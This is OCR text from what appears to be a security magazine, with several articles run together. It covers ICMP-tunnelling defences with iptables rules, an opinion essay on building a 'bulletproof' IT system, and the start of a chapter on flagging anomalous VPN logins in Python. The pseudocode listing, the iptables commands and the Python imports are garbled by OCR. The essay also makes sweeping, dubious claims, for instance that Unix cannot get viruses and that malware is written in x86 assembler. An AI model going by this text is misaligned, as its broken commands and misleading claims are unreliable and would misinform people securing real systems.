blocking the addresses from where you do not want any 
ping request and reply messages. 


Firewall Rules 

Disable part of the ICMP traffic allowed by a firewall. For ex- 
ample, disable incoming echo requests, while allowing out- 
going echo requests. If naively implemented, policies like 
this will still allow covert communication, limiting only which 
host needs to start a communication. In addition, outgoing 
ICMP packets could be used to establish an unidirection- 
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al channel to send compromised information. It is impor- 
tant to understanding how operating systems respond to 
ICMP Messages. This will allow us to determine what type 
of ICMP Messages should only be allowed in and out of the 
network. With appropriate configuration of the packet filter- 
ing device to block unnecessary ICMP Messages, poten- 
tial threats resulting from ICMP Messages can be reduced. 
This, however, should be done wisely and selectively. 
Hence the first stage in network security against these 
type of attacks is to build up sophisticated firewall rules, 
which allow only trustworthy nodes into your network. Some 
examples of firewall rules which can be implemented are: 


1. Drops all incoming echo-request packets. 
iptables -A INPUT -p icmp --icmp-type echo-request -] DROP 


2. Disable all the outgoing ICMP echo request packets 
from a source IP to destination IP. 


iptables -A OUTPUT -p icmp --icmp-type 8 -s SSOURCE IP -d 
SDEST IP -}] DROP 


3. Drop all incoming echo reply packets. 

iptables -A INPUT -p icmp --icmp-type 0 -]j DROP 

4. Drop all outgoing echo reply packets. 

iptables -A OUTPUT -p icmp --icmp-type echo-reply -j] DROP 


However, setting up such rules leads to a large number 
of problems for those who want to work in an open net- 
work or need the ICMP messages over the entire net- 
work for proper functioning. 


General ways to mitigate attacks 


¢ Limit the size of ICMP packets. Large ICMP pack- 
ets can be seen as suspicious by an IDS system that 
could inspect the ICMP packet and raise an alarm. 
However, since there are legitimate uses for large 
ICMP packets it is dificult to determine if a large IC- 
MP packet is malicious. For example, large echo re- 
quest packets are used to check if a network is able 
to carry large packets. Differentiating legal from ille- 
gal large packets is even more dificult if covert com- 
munication is encrypted. 


But allowing only fixed size ICMP packets would not 
avoid ICMP Tunnel since the data can be broken into 
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smaller chunks, fixed ones, and reassembled by the Re- 
ceiver. We can easily change the size of the data, even 
writing fixed size data, by adding one layer to control se- 
quence numbering, offset, etc. 


¢ Preserve the state of the ICMP packet to check for 
covert channels. This can be done by constructing a 
daemon that will construct a new echo request with a 
new sequence number, new time to live, and a new 
payload (with new checksum). When the reply is re- 
ceived it is ensured that the data is the same as what 
had been sent, and the sequence number and re- 
sponder’s IP address are valid and as expected. After 
a successful check, the echo reply can be transmit- 
ted back to the original client. 


Although the state preserving technique can easily pre- 
vent ICMP tunneling, it is a computing intensive process. 


¢ Another way to remove ICMP tunneling could be to 
simply truncate the data field of ICMP. However, trun- 
cation of the data field will require amendments in the 
RFC. Scanning and erasing of the ICMP data field is 
compliant with RFC and prevents ICMP tunneling ir- 
respective of the type of firewall used. 

¢ Simply marking out unused and potentially danger- 
ous portions of ICMP packets is a straightforward 


task and requires little overhead on a modest system. 
Simple string scans are also not costly and can be 
done to test for unencrypted covert communication. 
This is highly recommended for the end hosts where 
it offers minimal overhead on the system. For routers 
it can be expensive, where a simple disable on ICMP 
Echo Reply can work. Encrypted channels are more 
difficult to scan. 


ICMPSec 
The idea of ICMPSec is inspired from IPSec used to se- 
cure IP packet transfer in IPv6. Internet Protocol version 
6 (IPv6) is the latest revision of the Internet Protocol (IP). 
IPv6 was developed by the Internet Engineering Task 
Force (IETF) to deal with the long-anticipated problem of 
IPv4 address exhaustion. IPv4 and IPv6 are not interop- 
erable. ICMPv6 forms a critical part in functioning of the 
protocol and is majorly used in error detection, Stateless 
address autoconfiguration (SLAAC) and packet fragmen- 
tation. [IPSec uses Security Associations (SA) along with 
Authentication Headers (AH) and Encapsulation Secu- 
rity Protocol(ESP) to protect IP messages on an end-to 
end basis. An ICMP message not protected by AH or ESP 
is unauthenticated and its processing and/or forwarding 
may result in denial of service. 

But it is expected that many routers and hosts will not 
implement IPsec for transit traffic owing to its complexity 


Listing 2. Basic outline for the LEARNING MODULE ALGORITHM 
(Pseudo Code) 


GENERAL SCAN () 

Sew 

Sieic MES OME? <j; intial “wibinile¥eic Cus Jocicl<eics! silikeyiecl aim I Seie— 
onds 

See BUBSER IACKSES? <7 fei ellllenimlag imemes Cie Jess ibuiloysic 
of packets 

Sét OVERFLOW; # max times MAX TOT can be increased 

Geie WE RO? 7 iibiilesic Cie well) joslehkeics weceieel iil I 
seconds 


SSL LIMSS MNC@eese = C2 


if MAX RECV < MAX TOT: 
Mi TOE MEE EC ys >  SU Prin ve aeKiaS 
elise 
MAX TOT = MAX RECV + BUFFER PACKETS; # Increasing MAX 
LOR 
ines muNemeases 
Te AVC ies lOiecersis > OW AUTOM) 
PETER THE PACKETS) 


IANS el INC ee) 

See tle tp address in anvacnay whiece MAX REC y Max 
TOTAL and number of times it goes like that in inter- 
velonOr ll eseconds. 

If happens for more than X times: 

Pate RN DET Eel loON G) 

If happens for more than Y times: 


Block the ip address 


PATTERN DETECTION () 
Check data packet size <= 56 bytes 
Make the data payload null if possible. 
Or encrypt the payload and send to application layer. 
Else look if the payload field has commands like ‘rm’ 
Ore as ee 

Check the sequence numbers of all incoming packets - 


generally they do not follow the incremental pattern 


in Case Of an attack 
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and thus strict adherence to IPSec would cause many ICMP 
messages to be discarded. Also, when transmitting small 
packets, the encryption process of IPSec generates a large 
overhead. This diminishes the performance of the network. 

To minimise the complexities involved in building up an 
IPSec module in kernel, we propose to build an ICMP- 
security application (ICMPSec) which will try to address 
the vulnerability concerns of ICMP protocol. It is a mod- 
ule which will capture ICMP packets at the kernel level 
and scan and filter them accordingly for intrusion detec- 
tion and intrusion prevention. 

The program that we aim to develop to counter these 
security vulnerabilities will include some of the strategies 
already discussed to prevent ICMP data leakage: 


¢ IDENTIFY PACKET RATIO: Large number of ICMP 
packets from a same single source can be a sign of a 
DDOS attack. The program will identify such packets 
and only allow packets which do not exceed a certain 
number of packets vs time ratio (keeping the source 
fixed). But DDOS attacks generally originate from 
multiple sources; to tackle that we can generalise the 
program to not exceed the ratio irrespective of the 
source. 

¢ PATTERN DETECTION OF DATA FIELD: The number 
of bytes in the data field must be limited to a number 
not greater than a fixed number (for example 56 bytes). 
This will prevent large amounts of data from going out 
in a single packet (unless hacker programs support 
fragmentation, in which case stricter measures are re- 
quired). Major amounts of data leak can be prevented 
by proper scanning of the data field. Keywords like “su- 
do’, ‘Is’, and “system” commands can be detected with 
a proper filter in place. Although the data could be en- 
crypted and hacker programs might have sophisticated 
encryption decryption techniques. 

¢ PROPER SEQUENCING of PING PACKETS: Multi- 
ple echo replies to a single echo request packet must 
be stopped. Also all packets must follow a proper se- 
quencing protocol so that packets from unreliable 
source programs (with random sequence numbers) at 
the application level are not sent. 

¢ ENCRYPTION OF DATA FIELD: Generally the da- 
ta in ping packets is not useful. Most of the informa- 
tion could be inferred from the code number as well. 
The payload of ICMP packet is often timing informa- 
tion, which can be dealt as a special case. Otherwise 
all the packets going out can have their data field en- 
crypted with the key the host chooses, so that even 
if the hacker receives any of the packets, it does not 
make sense to him unless he has to key too. 
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The module is based on a self-learning algorithm which 
identifies the average number of incoming packets and 
outgoing packets and the ratio between them. The algo- 
rithm works well for implementation purposes with sim- 
ple test data, but is naive and can easily be generalised 
to larger test data packets and complex algorithms in- 
volving clustering and the Markov module. 

Even with proper filtering of ICMP traffic, an Intrusion 
Detection System must be deployed further to monitor the 
kind of ICMP activities and analyse any anomalies in the 
received data. 
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Dear JP Morgan, Target, 
Neiman Marcus, Michael's, 


Home Depot... 


My original intent was to write a kind of smart-ass open letter to the 
above victims of recent system breaches and data theft, pointing out 
the various mistakes they made in putting together their IT systems. 
After some consideration, | decided that it would be less patronising 
to merely present best-practice in system security as a series of points 
with a short discourse on the relative merits of each point. 


What you will learn... 


« All the components of a bulletproof IT system 
¢ How to design an IT installation 


to close all ports except 80 on your firewall or by tell- 

ing you how to set up the permissions on the operating 
system. Instead, we'll list all the components of a bullet- 
proof IT system, and you can choose to omit various parts 
if the extra risk is justifiable. 


| promise not to insult your intelligence by telling you 


A Bulletproof IT System 

Let's assume that we want to design a hypothetical IT instal- 
lation, which can be considered to be for either a retail op- 
eration or a financial institution, equipped with either POS or 
ATM terminals, operated by bank cards or store cards. 

The system will possibly consist of a web server, with 
your landing page and login page, a database server, a 
business server, which contains transaction records and 
account details, and an authentication server, which con- 
firms the identity of each system user. 


The Hardware 


Don't run your web server on an Intel processor. Use Sun, 
Hewlett-Packard, or IBM proprietary hardware. 
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What you should know... 


- Basic knowledge of Unix 
- Basic knowledge of Web Servers 


| did say “Bulletproof”, so this recommendation has 
to be included; but, before you say ‘As if!”, ask yourself 
this question: 


“In what language 1s malware written?” 


If you answered “x86/x64 assembler”, then you win a prize. 

Malware is written to run on an Intel CPU, since these 
are universally deployed in machines throughout the 
world, and it is cost-effective for the hacker to concentrate 
his efforts on malware which will attack the largest target 
market (no pun intended). 

So even if the bad guys manage to plant their rubbish 
on your machine, it won't run. 

Of course this is, at best, security by obscurity since 
when enough companies have made the switch, hackers 
will learn how to write malware for other CPUs. 

However given the current market forces, this is unlikely 
to happen in the next decade, which may justify the cost 
of removing this large element of risk. 

lf | ran a bank, I'd do it. 
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The Operating System 

Use Unix 

lf you can’t use Unix, stop reading now and go and find 
something else to do. 

Unix was designed to be used by hundreds of university 
students and software developers, with the express intent 
that they should be incapable of interfering with each oth- 
er or breaking each other’s toys. The concept of permis- 
sions saw to that. 

Unix doesn't suffer from viruses since the worst a virus 
can do is trash the environment of the person who intro- 
duced it. It can’t replicate because it doesn't have per- 
mission to do so, and it can’t infect the boot sector or the 
memory for the same reason. 

PCs were designed to be Personal Computers, and nei- 
ther DOS nor Windows was designed to be used by more 
than one person. This is why they had no network capa- 
bility until MS ported the BSD socket libraries to Windows 
(remember ‘winsock.h’’?) 

Some people don’t like Linux because it’s a bit too home- 
grown, and they’d like the warm fuzzy feeling of being able 
to contact a support person if something falls apart. 

lf you really must use an Intel CPU, these versions of 
Unix (in order of preference/support) will do it: 


¢ Sun Solaris. Easy to install, excellent support. 

¢ Xinuos, derived from SCO OpenServer (reportedly, 
used by McDonald’s, Pizza Hut, NASDAQ et al) 

¢ Apple OS X. Well, it is Unix... 

¢ CentOS (okay, so it’s Linux, but it’s very robust). 


The Network 
¢ Each server on its own subnet 


It's a fundamental law of system design that the only thing 
accessible from the web should be the web server. The 
other components, like the database server and business 
server, should be totally invisible. In other words, it should 
be impossible to type a URL into a browser and access 
any of the other system components. 

We do this by running everything except the web server 
on a separate subnet. 

It works like this: The web server (probably apache) 
is configured to proxy pages from the business server. 
The business server is configured to only accept connec- 
tions from the CGI of the web server. As far as the user’s 
browser is concerned, its address bar shows the pages as 
if they were resident on the web server. If the user types 
the apparent address in the address bar, apache will re- 
spond with ‘404 — page not found’. 
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Otherwise you'd be able to directly access bank bal- 
ance sheets by typing a URL. 


The apache Server 


¢ Remove GET permission from the cgi-bin directory 

¢ Remove POST permission from the htdocs directory 
and the icons directory 

¢ Remove any files from these directories which shouldn't 
be there, such as backup copies of web pages. 


Backdoors are planted with POST queries to the htdocs 
and icons directories. Utilities such as ‘wget’ are used 
to suck all the files from any accessible directory, and 
recreate a copy of your website, which is then used to 
spread malware and recruit members for a botnet. Ad- 
ditionally, all the web pages retrieved from your htdocs 
directory get examined by the hacker, (especially the ja- 
vascript and hidden inputs), for clues as to how to hack 
your system through your CGI. 


The Application Software 


¢ Don’t use PHP: Around 90% of all hack attempts ex- 
ploit Known vulnerabilities in PHP and applications 
written around it, such as Joomla and WordPress. At- 
tack queries usually attempt to overwrite index.php, 
wp-login.php and a whole bunch of images in Word- 
Press and Joomla. 

¢ Only use compiled code for CGI executables: Any- 
thing which runs in an interpreter, such as_ shell 
scripts, perl scripts, ruby or PHP scripts, can have 
code understood by the interpreter added to it. This is 
how SQL injection and cross-site scripting is done. In 
this context, if your website uses forms, make abso- 
lutely certain that whatever collects the form data is 
not an interpreted script. 

¢ Only do trivial form integrity checks in javascript. Javas- 
cript can be read directly in a user’s browser and re- 
written by a hacker. If you do something dumb, like us- 
er authentication, in javascript, you'll find yourself with 
a few extra unexpected users logged in to your system. 


BYOD - The Enemy Within 
Don’t BYOD. Turn off DHCP or, at least, limit it to a few 
known, trusted MAC addresses. 

Resist the attempts by HR to make you feel guilty, and 
point out that other people’s money is at risk, and that the 
company’s hardware is good enough for the users. 

Sure, MAC addresses can be faked, but the risk of that 
happening is less than the risk associated with throwing 
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free IP addresses at anyone with a laptop. If you permit 
uncontrolled BYOD, you deserve to get hacked. Even if 
everyone is security-conscious and trustworthy, they will 
be going home with your data on their devices. Ask the 
FBI about a certain operative, who left his laptop on a 
park bench... 

Also, nobody stays in one job forever. When they leave 
the company, perhaps to join your competitor, they will be 
taking your data on their mobile phones, slabs and lap- 
tops. Of course, you can always wipe the hard drive. 

Yeah, right. 


POS Terminals, ATM’s and other entry points 
see “Authentication”. 


Authentication 


¢ Don’t use username/password: My granny can write 
you a man-in-the-middle script, which will collect 
these things by the hundreds. She can also write an- 
other script, which will use them to login to your sys- 
tem. Especially, if you let her use her own laptop on 
your WiFi. 

¢ Don't use biometrics: Despite it sounding like the per- 
fect uncrackable method of identifying a user, just re- 
member that biometric data is stored and transmit- 
ted in digital format. This means that the simplest 
man-in-the-middle attack (as performed by my gran- 
ny, earlier) can save and store for reuse, a username 
and its related biometric data. This method is no 
more secure than username/password. 

¢ Two-factor authentication at its most basic is a card 
and PIN: Ask customers of the companies mentioned 
in the title of this piece how secure that is. Even if the 
card is replaced by a dongle, everything works fine 
until the POS or ATM has malware installed on it, 
which reads all the credentials. 

¢ For the only truly uncrackable method, read this pa- 
per. http://www.finextra.com/blogs/fullblog.aspx ?blogid 
=9812 


Intrusion Detection System 

Use content-based, not rule-based systems: A rule-based 
system refers to a huge table of known hack sites, be- 
fore deciding whether to allow the connection. Apart from 
the fact that a huge number of available systems are just 
badly-written interpreted scripts, with the response time 
of an offshore call centre, they suffer from the obvious 
drawback that the number of “known” hack addresses is 
far outweighed by the unknown ones. Yes, you do get up- 
dates, but the hackers get more than you. 
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A content based IDS looks at the incoming query itself, 
rather than trying to guess whether the source address is 
good or bad. If it sees, for instance a string like “../../../" in 
the query, it’s a fair bet that it’s not a potential customer. 

Similarly, if it sees a query partly written in hexadecimal 
ASCII codes, it again assumes that the sender is after 
your savings. 

Best of all, having identified a hacker, the IDS can add 
a firewall rule to block his address. No need to wait for a 
third-party update. 

Such an IDS is described in detail here: http:/www. 
linkedin.com/pulse/article/20 14092 7080143-5739491 /-a- 
gentleman-s-guide-to-intrusion-detection-and-protection? 
trk=mp-edit-rr-posts. 


In Conclusion 
A few years ago, | was at a training course on the island 
of Guernsey. 

Lured by the descriptions of the wild nightlife, on the 
neighbouring island of Jersey, a few of us decided to take 
an evening flight on one of the strange wood-and-paper 
aeroplanes, called ‘Islanders’, that used to make the trip 
at the time. 

While we sat in the hotel bar, waiting for the airport bus, 
a storm of enormous proportions blew up, with lightning, 
howling winds and horizontal rain. Then, a figure came to- 
wards us, and said, “Look, | have to go since I'm the pilot. 
You guys still have a choice’. 

Fueled with copious quantities of the local ethylene 
hydroxide, we ignored his advice, piled on the bus, and 
made the trip. 

This article is a bit like that. My company is in the se- 
curity business, so we can't afford not to implement all of 
the measures mentioned above. Your company probably 
isn’t, so you can choose what works for you. 
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Performance and 
Reliability is critical 


Download syslog-ng Premium Edition 
product evaluation here 


Attend to a free logging tech webinar here 
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Reliable Log Transfer Protocol™ 
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Finding Security Insights, Patterns, and Anomalies 


in Big Data. Access Analytics 


There are so many ways that malicious users can access 

IT systems right now. In fact, the very technologies affording 
us the convenience to remotely access our IT systems are 
the ones that are being manipulated by malicious users. 

In today’s IT environment, physical access is no longer 

a hindrance to gaining access to internal resources and data. 


emote access technologies such as virtual pri- 
R vate network (VPN) are commonly used in busi- 

ness environments. While these technologies 
provide increased efficiency in terms of productivity, they 
also introduce another level of risk into an organization. 
There have been many incidents lately stemming from 
remote access intrusions. In fact, several studies indi- 
cate that the majority of data breaches were linked to 
third-party components of IT system administration. 

It is important to have a security program where we can 
quickly identify misuse of system access. In so doing, we 
are able to limit any damage that could be done through 
an unauthorized access. But how can you, as a securi- 
ty professional, track anomalous behavior and detect at- 
tacks? We need to have efficient ways of monitoring re- 
mote access data. 

Unfortunately, many current products for third-par- 
ty remote access do not offer granular security settings 
and comprehensive audit trails. If they do, they do not 
have advanced misuse or anomaly detection capabili- 
ties that will help security professionals identify poten- 
tial unauthorized access scenarios. 

In this chapter, we would like to provide some techniques 
and tools that could help you in these types of scenarios. 
Some of the things we will explore include knowledge en- 
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gineering, by means of programming detection strategies. 
lf you do not know how to program, do not worry. We will 
provide simple techniques and step-by-step walk-through 
instruction to get you going. 


TECHNOLOGY PRIMER 

First off, we will provide a brief background of the technol- 
ogies involved in our scenario. As you can tell by the in- 
troduction, we will be focusing on detecting unauthorized 
access in remote access technologies. 

You may already be familiar with some of the technolo- 
gies that we will be using in our scenario: they include re- 
mote access, VPN, and python. Our main data set in our 
scenario is VPN logs. We will use Python to create a pro- 
gram that will process the VPN logs. Our goal is to use 
a variety of techniques to identify anomalies in our data set. 

First off, let us talk about our data and the technology 
that is involved in it. 


Remote Access and VPN 

What is VPN? 

Basically, VPN is a generic term to describe a combina- 
tion of technologies allowing one to create a secure tun- 
nel through an unsecured or untrusted network, such as 
public networks like the Internet. This technology is used 
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in lieu of a dedicated connection, commonly referred to 
as a dedicated line, from which the technology derives its 
“virtual” name. By using this technology, traffic appears to 
be running through a “private” network. 


How does VPN work? 

Data in VPN are transmitted via tunneling. Packets are 
encapsulated or wrapped in another packet with a new 
header that provides routing information. The route that 
these packets travel through is what is considered as the 
tunnel. There are also different tunneling protocols, but 
since this is not within the scope of this book, we will not 
be covering these protocols. Another thing to note about 
VPNs is that the data are encrypted. Basically, data go- 
ing through the tunnel, which is passed through a pub- 
lic network, are unreadable without proper decryption 
keys. This ensures that data confidentiality and integrity 
is maintained. 


What are the Dangers of VPN? 

Using VPN in general is considered good practice for re- 
mote access. This makes packets going through a public 
network such as the Internet unreadable without proper 
decryption keys. It also ensures data are not disclosed or 
changed during transmission. However, by default, VPN 
generally does not provide or enforce strong user authen- 
tication. Current VPN technologies support add-on two- 
factor authentication mechanisms, such as tokens and 
various other mechanisms, which were mentioned earlier. 
However, by default, it is simply a username and pass- 
word for gaining access to the internal network. This can 
present a significant risk because there could be scenar- 
ios whereby an attacker gains access to these creden- 
tials and subsequently to your internal resources. Here 
are a few examples: 


¢ A user can misplace their username and password. 

¢ A user can purposely share their username and 
password. 

¢ A user can fall victim to a spear phishing attack. 

¢ A user might be using a compromised machine with 
malware harvesting credentials. 


In any of the above scenarios, once an attacker ob- 
tains the user’s credentials, assuming there is no two- 
factor authentication, the attacker would be able to 
gain access to all internal resources to which the user 
currently has access via the user’s remote profiles and 
access rights. Thus, determining the access rights is 
a major factor in determining the potential extent of the 
compromise. 
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Monitoring VPN 

As this chapter is about detecting potential unauthorized 
remote access, it is important to provide you with a brief 
background on logging VPN access. Most VPN solu- 
tions have, in one form or another, logging capabilities. 
Although much of the logging capability is dependent on 
the vendor, at the very least, your VPN logs should con- 
tain the following information: 


¢ User ID of the individual, 

¢ Date and time of access, 

e What resources were accessed, and 

¢ The external IP from which the access was made. 


There are many VPN solutions, so it would be impossible 
to outline all the necessary instructions to obtain your or- 
ganization’s VPN log data, but your network administrator 
should be able to provide log data to you. For the purpos- 
es of this chapter, we will be providing you with a sample 
data set that contains the aforementioned data. 

In general, log data are fairly easy to obtain. However, 
monitoring the logs to ensure that the people who are log- 
ging on are actually employees of your organization is an- 
other matter. Let us say your organization has 5000 em- 
ployees and one-quarter of them are given VPN access. 
There are still over 1000 connections that you will have to 
review. Obviously, you will not be able to ask each and ev- 
ery employee if they made the connection, right? We cer- 
tainly do not lack the data; however, we are limited by our 
analysis capabilities. This lack of analysis is what we will 
be focusing on in this chapter. 


Python and Scripting 

In most cases, we are stuck with whatever data that we 
have. If your VPN software provides robust detection 
and analytics capability helping you to identify potentially 
anomalous access cases, then your organization is off to 
a great start. Oftentimes, you just have a spreadsheet of 
VPN access, similar to what we will be providing to you in 
this chapter. Therefore, we will show you how to build this 
capability, with a little bit of programming, so that you may 
conduct your own analysis. 

Typically, programming is not what 99% of security pro- 
fessionals do for a living. Unless you work directly in rec- 
reating vulnerabilities or exploits in software, it is a skill 
that most of us know about but rarely use. We believe 
that learning to program is a valuable and useful skill for 
security professionals. You do not need to know how to 
program complex software, but programming can help 
you to automate efforts that would otherwise take a lot 
of time. For example, let us say we wanted to review all 
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of our VPN logs. This could be a sinificant task, so provid- 
ing some degree of automation, particularly if the logic is 
repetitive, would really help you. In this regard, knowing 
how to program or use a “scripting language’ would great- 
ly benefit you in making the process more efficient. 


What is a Scripting Language? 

There is still some ambiguity on what can be considered 
a scripting language. In principle, any programming lan- 
guage can be used as a scripting language. A script- 
ing language is designed as an extension language for 
specific environments. Typically, a scripting language is 
a programming language used for task automation, as op- 
posed to tasks executed one-by-one by a human operator. 
For example, these could be tasks a system administra- 
tor can be doing in an operating system. For our purpose, 
you can think of a scripting language as a general-pur- 
pose language. 

Scripting languages are often used to connect system 
components, and are sometimes called “glue languag- 
es.” One good example is Perl, which has been used a lot 
for this purpose. Scripting languages are also used as a 
“wrapper” program for various executables. Additionally, 
scripting languages are intended to be simple to pick up 
and easy to write. A good example of a scripting language 
that is fairly easy to pick up is Python. So, this is the lan- 
guage that we are going to use in our scenario. 


Python 
Python is relatively easy to learn while being a power- 
ful programming language. The syntax allows program- 
mers to create programs in fewer lines than it would be 
possible in other languages. It also features a fairly large, 
comprehensive library and third-party tools. It has inter- 
preters for multiple operating systems, so if you are using 
a Windows-, Mac-, or Linux-based machine, you should 
be able to access and use Python. Finally, Python is free, 
and since it is open source, it may be freely distributed. 
Python is an interpreted language, meaning you do 
not have to compile it, unlike more traditional languages 
like C or C++. Python is geared for rapid development, 
saving you considerable time in program development. 
As such, it is perfect for simple automation tasks, such as 
those we have planned for in our scenario for this chapter. 
Aside from this, the interpreter can be used interactively, 
providing an interface for easy experimentation. 


Resources 

As this book is not a Python tutorial book, we will point you 
to really good resources that will help you to start using Py- 
thon. The following are lists of recommended resources: 
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Codecademy 

A great resource that we highly recommend to start with 
is the Python track of Codecademy: http:/www.codecad- 
emy.com/en/tracks/python. 

Codecademy is an online interactive Web site for learn- 
ing programming languages. One of the key resources 
is Codecademy’s online tool, which provides a sandbox 
in your browser, where you can actually test your code. 
The site also has a forum for coding enthusiasts and be- 
ginners, which is helpful when you encounter problems. 


Python.org 

Python.org is the official Web site for Python. Python is 
a very well-documented language -— it is apparent in the 
amount of documentation available on the site. The full 
documentation for Python 3.4 (the stable version during 
the time of this writing) is available on the following link: 
https://docs.python.org/3.4/. 

As you will see, the documentation is comprehensive. 
When you become more experienced with Python, this 
will be a great source of information. However, before you 
go too deep, you should go to this link for a basic tutorial 
to first get your feet wet: https://docs.python.org/3. 4/tuto- 
rial/index.html. 


Learning Python the Hard Way 

Contrary to the title, this is actually a really good resource 
in learning Python. It is a beginners programming course 
that includes videos and a downloadable book. Following 
is the main Web site: http:/Jearnpythonthehardway.org. 

But if you do not want to pay for the videos and the down- 
loadable book, the content is also available on an online 
version here: http:/learnpythonthehardway.org/book/. 

The course consists of about 52 exercises. Depending 
on your skill level and the amount of time you want to in- 
vest in learning the language, the author claims it can take 
as little as one week, and as long as six months. Nonethe- 
less, it is a very good resource and should be something 
that you should consider reviewing. 


Things to Learn 
At the very least, you should consider learning the follow- 
ing Python topics: Python syntax, strings, conditionals, 
control flow, functions, lists, and loops. 

lf this is your first time with a scripting language, do not 
worry. You do not have to be an expert in Python to be 
able to continue with this chapter. As we go through the 
scenario, we will be explaining what each piece of the 
sample code is doing. But before that, let us go into more 
detail on our scenario and the techniques we will actually 
use to solve the problem. 
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SCENARIO, ANALYSIS, AND TECHNIQUES 
Let us discuss the overall scenario we will be using. We will 
break this down based on the questions we need to answer: 


¢ What is the problem? 

¢ What are the data that we will be using and how do 
we collect them? 

¢ How will we analyze the data? What techniques are 
we using? 

¢ How will we be able to practically apply the analysis 
technique to the data? 

¢ How to deliver the results? 


Problem 
In our scenario, we want to show how to identify poten- 
tially unauthorized remote accesses to an organization. 


¢ Data Collection 

¢ The data we will be using for our scenario are the 
VPN access logs. At a minimum, the data will contain 
the following information: 

¢ User ID 

¢ Date and time of access 

¢ Internal resource accessed (internal IP) 

¢ Source IP (external IP) 


We will assume that the below-listed data were provided 
to us as a Spreadsheet, as this is the most common way 
for exporting data. For now, you can leverage the data 
set provided as part of this book. Here is a sample ex- 
tract from that data set (Figure 1): 


Data Analysis 
Before we go into identifying potentially anomalous VPN 
logins, let us think about a simpler scenario. If you were 
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going through your credit card transaction statements and 
saw the below-listed events, what would you have con- 
cluded? 


¢ Your credit card was used at the same time at two 
different locations; 

¢ Your credit card was used in Russia (and you have 
never been there); 

¢ Your credit card was used in two different physical lo- 
cations in the same hour when it is physically impos- 
sible to get there in an hour; and 

¢ Your credit card was used a hundred different times 
in the course of the week. 


These are indicators that your credit card may have 
been compromised. While this is a simplistic example, 
we will be extending this type of analysis in our scenar- 
io by looking for anomalous behavior indicating a com- 
promise. 

So now, let us review our VPN access logs. Let us as- 
sume that you only had to review your access. How would 
you review the VPN access logs manually? What would 
you look for? It would be fairly straightforward, right? Let 
us use the same fact pattern we used for the credit card 
transactions. 


¢ Your user ID logged in concurrently from two different 
IP addresses; 

¢ Your user ID logged in from Russia (and you have 
never been there); 

¢« Your user ID was used twice in an hour from your of- 
fice and your home when it is physically impossible to 
get there in an hour; and 

¢ Your user ID logged in from a hundred different IP ad- 
dresses in the course of the week. 
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Figure 1. Sample data set: VPN logs 
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It makes sense, right? This is just plain logic and com- 
mon sense, assuming we are only looking for the nar- 
row fact patterns listed above. If you think about it, there 
could be other scenarios in which you could look for sim- 
ilar anomalous behavior. For example, listed below are 
sample questions that could lead us to finding anoma- 
lous user connections: 


¢ How much time does a user’s session usually take? 

¢ What time does a given user usually log in? 

¢ At what time does a given user’s connection usually 
originate? 

¢ At what time does a given source IP address usual- 
ly originate? 

¢ At what time do all connections usually originate from? 

¢ At what time do connections from a certain city 
(based on the IP address) usually originate? 

¢ What is the relationship between log-in time and ac- 
cess time of an internal system? 

e What time does a given user usually log off? 

¢ What time does a source IP address usually log off? 

¢ What time does a user’s country usually log off? 

¢ What time does a user’s city usually log off? 

e What time does an internally accessed system have 
in common with the log-off time from the VPN? 

¢ From what source IP address does a given user orig- 
inate? 

¢ From what country does a given user originate? 

¢ From what city does a given user originate? 

¢ What internal system does a given username usual- 
ly access? 

¢ What is the IP address with which a country is usual- 
ly associated? 

e¢ What is the IP address with which a city is usually as- 
sociated? 

¢ What users connected to an internal system? 

¢ With what country is a given city associated? 

e Which internal systems are accessed from which 
country? 

¢ Which internal systems are accessed from certain 
cities? 


As you can see, we have raised multiple questions 
that could indicate a potentially suspicious connection. 
But for now, let us focus on one potentially critical fac- 
tor: distance of connection. Obviously, even if a user was 
working remotely, it would be suspicious if a user logs in 
from multiple locations when it is physically impossible to 
be there. Of course, there could be exceptions. For ex- 
ample, a user could log in from one machine at a partic- 
ular location, log off that machine, and then log in from 
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different machine at a different location; however, this is 
suspicious, in itself. 

SO, first we need to ask ourselves what would be a good 
way to determine if the distance between locations is sig- 
nificant. For this, we can use haversine distances. 


Haversine Distances 

Haversine distance is a formula for finding the great-cir- 
cle distance between a pair of latitude—longitude coordi- 
nates. Basically, it is a calculation of geographic distance 
(latitude and longitude), which incorporates the concept 
of measuring spherical distance (as the Earth is nonper- 
fect sphere). This equation is important in navigation, but 
can be applied in other applications. For example, it can 
be used to determine accessibility of health-care facili- 
ties within a certain geographical area. The haversine dis- 
tance technique can also be used in crime analysis ap- 
plications, such as finding incidents taking place within 
a particular distance. 

We will not go through the math involved in calculating 
a haversine distance, but we will cover how we can apply 
this to our problem. Simply put, the greater the haversine 
distance, the greater the distance between the sources of 
the remote logins. And, the greater the distance between 
the remote logins of one particular user in a given time 
span, the greater are the chances that this was a poten- 
tially anomalous user access. 


Data Processing 

So now, we have the data (the VPN logs) and we have our 
analysis technique (haversine distances). But how do we 
put these together? This is when our scripting or “glue” 
language comes into play. In order to process the data, 
we will have to create a script that will do the following 
things: 


¢ Import the data: First, we will need to be able to im- 
port the VPN logs so that our program can process it. 
For example, if the data are in the form of a spread- 
sheet, then we will need to be able load the data from 
the spreadsheet into memory so that we can prepro- 
cess the data and then apply our analysis technique. 

¢ Preprocess the data: “Preprocessing” is making the 
data better structured, so it can be used by our anal- 
ysis technique. For example, our VPN logs would on- 
ly have source IPs. In order to actually get the haver- 
sine distance, we will need to be able to get the lat- 
itude and longitude values. Aside from that, we will 
need to do some error checking and validation to 
make sure the data we are entering for analysis are 
valid. As they say, “garbage in, garbage out.” 
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¢ Apply the analysis technique: Once we have all the 
necessary data, we will then use our analysis tech- 
nique, which in this case is the haversine distance. 

¢ Generating the results: Finally, once we get the ha- 
versine distance, we will need to determine a thresh- 
old for what is unusual for a certain amount of time. 
Obviously, we will look for a greater haversine dis- 
tance in a shorter log-in frequency span as being 
more suspicious. 


We have covered the basic steps we will be following 
in developing our Python program. In the next section, 
we start diving into the innards of our Python program. If 
you have some programming knowledge and can follow 
a program's flow (i.e., loops and conditions), you should 
be able to follow the case study even without any Python 
knowledge. If you do not have the programming knowl- 
edge, feel free to go through the primer resources pro- 
vided in the previous section. 


CASE STUDY 
Importing What You Need 


import argparse 
import re 
Import. CSV 
import math 


vas 


from datetime 


import datetime 


Now let us go over the code. First off, you will see sev- 
eral import statements. In most programming languag- 
es, a programmer is not expected to do everything 
from scratch. For example, if someone has already built 
scripts to handle processing of date and time, typical- 
ly one does not have to write them from scratch. Often- 
times, there are “modules” a programmer can “import,” 
so they can reuse the scripts and incorporate them into 
other programs or scripts. This is basically what is hap- 
pening with the programming code outlined above. 

